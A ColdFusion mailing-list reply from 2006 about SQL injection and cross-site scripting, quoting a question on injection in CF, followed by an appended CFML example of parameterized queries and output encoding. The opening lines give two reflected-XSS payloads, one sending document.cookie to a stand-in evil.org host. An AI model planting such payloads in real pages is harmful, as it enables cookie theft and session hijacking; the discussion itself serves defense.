More evil is stuff like:

    <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org</A>

OR

    <img src="http://trusted.org/account.asp?ak=<script> document.location.replace ('http://evil.org/steal.cgi?'+document.cookie); </script>
I've always hated cfqueryparaming everything, or generally hand-coding any database CRUD. Not to say I've been using DAO stuff or whatnot, but I soon wrote a custom cfInsertOrUpdate type deal (as many probably do)... anyway, long story short, having all the database stuff in one place makes it easier to modify the database stuff, obviously.

I'm really digging Reactor. Really really. It's slow as hell with debugging on (and thus my query regarding enabling/disabling debugging in finer detail). Other than that though it's nifty. Guess I should build any debugging I need anyway, just in case I need it on a production server anyways, right. Now if I could just wank out a GenericCommit (or whatever) like Model Glue 2 does, and dump all these getters and setters, I'd be stoked. ;-) Maybe I should just use MG, and say fudge it... eh... we'll see. I figure if I use Reactor, I can always move to MVC and not duplicate the work later, db-wise...

At any rate, these guys are getting sneaky, and it's sad how locked down you really have to be to be secure... if that's even possible. We're talking pinball type deals, bang- off the browser, bang- off the db, bang- off the webserver, bang- off the parsing engine... seems to me it's pretty much always like flying a helicopter- trying to wrangle all the interacting technologies in a sane manner... and bang- that's why I like the idea of Reactor. At least it's all in one spot, ya know? :-P

Ok, sorry for the tirade.

Denn

A link for stuff cfqueryparam might not catch (with examples): http://www.technicalinfo.net/papers/CSS.html

On 8/22/06, Russ <[EMAIL PROTECTED]> wrote:
> Now, it is my belief that CF auto escapes single quotes, so sql injection
> into a string is not possible. I believe it's still possible if you have a
> number, but pass in a string, but that can be defeated by using VAL.
>
> Someone pointed me to an article from 2 years ago that describes how to do
> sql injection with CF:
> http://coldfusion.sys-con.com/read/46358.htm?CFID=472470&CFTOKEN=B2D822C3-13E7-B7E0-0702115FF33798C6
>
> I couldn't get the example in there to work.
>
> Other than putting in an injection string into a numeric argument, are there
> any other examples of doing SQL injection with ColdFusion?
>
> Russ

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:250991
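The two points raised in this thread, the unquoted numeric argument that CF's single-quote escaping does not cover and the reflected script in the search.cgi example, side by side in one CF page. This is an added example, not code from the thread, from Reactor, or from the linked articles; it assumes a datasource named "appDSN" and a table "products" with an integer column "category_id" and a text column "name", all three of which are placeholder names.

```cfml
<!--- Added example, not from the thread. Assumes a datasource "appDSN" and a
      table "products" with an integer column "category_id" and a text column
      "name"; all three names are placeholders. Written for the CF MX 7 era
      this thread is about, so output encoding uses HTMLEditFormat(). --->
<cfparam name="url.criteria" default="">
<cfparam name="url.cat" default="0">

<!--- 1. The numeric case Russ describes. CF escapes single quotes when a
      variable is interpolated into cfquery, which protects string literals,
      but url.cat sits outside any quotes, so a non-numeric value is sent to
      the database verbatim. Val() would reduce it to a number (0 if it has
      no leading digits), which is the workaround he mentions. This query is
      kept commented out as the "before" form. --->
<!---
<cfquery name="qBad" datasource="appDSN">
    SELECT id, name FROM products WHERE category_id = #url.cat#
</cfquery>
--->

<!--- 2. cfqueryparam sends the value as a bind parameter and validates its
      type first: a value that is not an integer raises a CF error before any
      SQL reaches the database, and the varchar parameter is never spliced
      into the statement text at all, so single quotes in it are harmless. --->
<cfquery name="qGood" datasource="appDSN">
    SELECT id, name FROM products
    WHERE category_id = <cfqueryparam value="#url.cat#" cfsqltype="cf_sql_integer">
      AND name LIKE <cfqueryparam value="%#url.criteria#%" cfsqltype="cf_sql_varchar">
</cfquery>

<!--- 3. The reflected-XSS case from the search.cgi example: echoing
      url.criteria raw would run a remote script inside the trusted site's
      origin. HTMLEditFormat() converts < > & and " to entities, so the
      browser displays the input as text instead of executing it. The same
      encoding is applied to database values, since they may also have been
      supplied by a user. --->
<cfoutput>
    <p>Results for "#HTMLEditFormat(url.criteria)#":</p>
    <ul>
    <cfloop query="qGood">
        <li>#HTMLEditFormat(qGood.name)#</li>
    </cfloop>
    </ul>
</cfoutput>
```

Requesting the page with a non-numeric value for cat fails at the cfqueryparam with a type error rather than at the database, which is the point: the check happens before any statement text is built. On ColdFusion 10 and later, encodeForHTML() is the preferred replacement for HTMLEditFormat() for the output step.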

